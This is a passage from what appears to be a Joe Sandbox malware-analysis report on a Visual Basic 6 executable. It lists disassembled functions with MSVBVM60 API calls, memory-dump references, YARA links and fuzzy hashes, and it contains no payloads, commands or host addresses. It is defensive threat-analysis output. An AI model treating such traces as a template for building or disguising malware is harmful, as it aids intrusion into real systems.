                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412760
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412767
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041278E
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004127B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 004127D5
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 004127DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004127E7
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 004127EE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412805
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412838
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041283F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412888), ref: 00412878
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412881
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0041289E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1066637744-0
                                                                                                                                                            • Opcode ID: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                            • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                                                                                                                            • Opcode Fuzzy Hash: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                            • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                                                                                                                            Function 00410780 Relevance: 52.7, APIs: 35, Instructions: 227COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004093D0,00000000), ref: 0041079E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004107CE
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004107DF
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004107EE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041080A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410844
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041085A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410873
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0041089C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004108A7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004108DE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041091D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410938
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041095E
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041096F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410984
                                                                                                                                                            • #616.MSVBVM60(?,?,?,00000000), ref: 00410999
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004109BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004109CA
                                                                                                                                                            • #517.MSVBVM60(?,?,00000000), ref: 004109DB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109E9
                                                                                                                                                            • #517.MSVBVM60(?,00000000,?,00000000), ref: 004109F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410A05
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00410A0C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410A30
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410A77
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00410A8D
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410AA6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410ACA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410B37), ref: 00410B03
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410B1B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B24
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B30
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3648932012-0
                                                                                                                                                            • Opcode ID: f6d16695df9303c9e04a169ad411270ce8fa77e13eac27ff0b18b6dfff5314bc
                                                                                                                                                            • Instruction ID: cf7582b6c84a3ebcd0dc45819e7631e4fb138bd8fd28df0a43539233d5c0ba2c
                                                                                                                                                            • Opcode Fuzzy Hash: f6d16695df9303c9e04a169ad411270ce8fa77e13eac27ff0b18b6dfff5314bc
                                                                                                                                                            • Instruction Fuzzy Hash: 7FA109B5901219DFDB14DFA0DD48BDEBBB4BF48304F1081AAE50AB72A0DB745A85CF58
                                                                                                                                                            Function 00410180 Relevance: 52.7, APIs: 35, Instructions: 220COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                            • #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 004104ED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$FreeSystem$AnsiMove$#525#616BoundsBstrChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1820427907-0
                                                                                                                                                            • Opcode ID: e972215e39b6492727ae8d91804215360ff4be539abedd5b4678075ad1540df6
                                                                                                                                                            • Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
                                                                                                                                                            • Opcode Fuzzy Hash: e972215e39b6492727ae8d91804215360ff4be539abedd5b4678075ad1540df6
                                                                                                                                                            • Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54
                                                                                                                                                            Function 0040C700 Relevance: 48.5, APIs: 32, Instructions: 452COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040C71E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040C74E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C7A1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040563C,0000001C), ref: 0040C7E9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0040C80D
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C81A
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1728155253-0
                                                                                                                                                            • Opcode ID: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
                                                                                                                                                            • Instruction ID: 528750ef8f6217dc53c7ee79ba9f07e518e2306c00ab0ecc930209c3b3704f0e
                                                                                                                                                            • Opcode Fuzzy Hash: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
                                                                                                                                                            • Instruction Fuzzy Hash: BA1229B5900208EFDB14DFA4C988BDEBBB5FF48700F208269E509B7291D7759985CF64
                                                                                                                                                            Function 0040EE70 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                            • #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                            • #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?), ref: 0040F18B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$#516#631$#537BstrCopyErrorOverflow
                                                                                                                                                            • String ID: VUUU$VUUU$gfff
                                                                                                                                                            • API String ID: 3310697333-2314002932
                                                                                                                                                            • Opcode ID: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
                                                                                                                                                            • Instruction ID: f629f5cd6c6994accf7ffd4865734aab981d1da92c9f489476db43807f34fb7a
                                                                                                                                                            • Opcode Fuzzy Hash: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
                                                                                                                                                            • Instruction Fuzzy Hash: FB717771E00105EBC718CFB9DA8959DBF76ABCC341F44413AE805FB6A4DA385D8A8B58
                                                                                                                                                            Function 004163E0 Relevance: 46.8, APIs: 31, Instructions: 331COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,00000000,72A0C33A,7294A3D7), ref: 00416456
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 00416487
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 0041649F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164C4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 004164F4
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00416513
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00416527
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416547
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416567
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 00416595
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 0041659E
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004165B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 004165C0
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004165F6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416606
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416622
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416632
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416665
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416675
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166BD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166F3
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416703
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416729
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416739
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416755
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416762
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 0041678D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004167B5), ref: 004167AE
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 004167CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2234381736-0
                                                                                                                                                            • Opcode ID: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                            • Instruction ID: f2618860313800eaedd81b2e61ad480ccb106d02fda6e258e19164c82fe6daf4
                                                                                                                                                            • Opcode Fuzzy Hash: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                            • Instruction Fuzzy Hash: 01C15D719002199BCF14DFA8CA80AEEB7B5FF48304F61459AD419B7280D775ED82CFA5
                                                                                                                                                            Function 0040E840 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 146COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E85E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E8A3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8B8
                                                                                                                                                            • #712.MSVBVM60(?,file:///,00406674,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E8D9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8E4
                                                                                                                                                            • #712.MSVBVM60(?,00407218,004055FC,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E905
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E910
                                                                                                                                                            • #572.MSVBVM60(00004002), ref: 0040E969
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E974
                                                                                                                                                            • #537.MSVBVM60(00000020), ref: 0040E97F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E98A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 0040E9B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00407220,00000000), ref: 0040E9C8
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040E9CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9DA
                                                                                                                                                            • #712.MSVBVM60(?,00000000), ref: 0040E9E5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9F0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0040EA0C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EA2E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EA78), ref: 0040EA71
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040EAA2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                                                                                            • String ID: $file:///
                                                                                                                                                            • API String ID: 1913684286-1087255347
                                                                                                                                                            • Opcode ID: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                            • Instruction ID: 6c3c390ee14800d438280c46509e4d6c9a5a921f8fc3fa6165506003015d033a
                                                                                                                                                            • Opcode Fuzzy Hash: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                            • Instruction Fuzzy Hash: 6551FA71900208EBDB04DFE4DE48BDEBBB4FF08714F208229E612BB2A4DB755A45CB54
                                                                                                                                                            Function 0040FBA0 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
